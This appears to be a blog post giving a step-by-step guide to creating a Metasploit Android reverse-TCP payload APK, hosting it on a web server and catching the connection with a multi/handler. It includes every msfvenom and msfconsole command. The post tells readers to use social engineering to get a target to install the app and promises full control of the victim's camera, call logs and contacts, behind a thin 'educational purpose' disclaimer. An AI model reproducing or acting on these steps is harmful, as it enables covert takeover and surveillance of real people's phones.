How to create a payload and access Android?
Try at your own risk.
Only for educational purpose.
First let us get the basics clear...
What is Payload?
In computer networking and telecommunications, when a transmission unit is sent from the source to the destination, it contains both a header and the actual data to be transmitted. This actual data is called the payload.
What we will do?
We will access the android device by creating a payload.
What we will get?
We will get the full control of the android device for ex camera snapshots, call logs, contact logs, apps installed in phone, system info etc.
How we will do this?
With the help of Metasploit we will create an apk file ie.payload. Then we will send this apk file to target target device. After installing the file on target device we will get full control of the device.
Lets Start...
We will use Kali Linux for this purpose.
First create a payload
root@kali :~# msfvenom -p android/meterpreter/reverse_tcp LHOST=(your ip) LPORT=5555 R > filename.apk
# mv (filename.apk) /var/www/html/
# cd /var/www/html/
Now you need to check for the status of apache server and start it.
Use these commands:
# sudo service apache2 status
# sudo service apache2 start
Now here is the time to show some social engineering skills...
Send this link format to the device and ask user to install it. Now how you do that its upon you.
(ip address)/filename.apk
NOW Enter Following Commands:
root@kali :~ # msfconsole
root@kali :~ # use multi/handler
root@kali :~ # set PAYLOAD android/meterpreter/reverse_tcp
root@kali :~ # set LHOST (your ip)
root@kali :~ # set LPORT 5555
root@kali :~ # exploit
And that's it!
When user installs app on device and clicks on it you will get access to device.
Stay Secure From Digital Threats
Comments
Post a Comment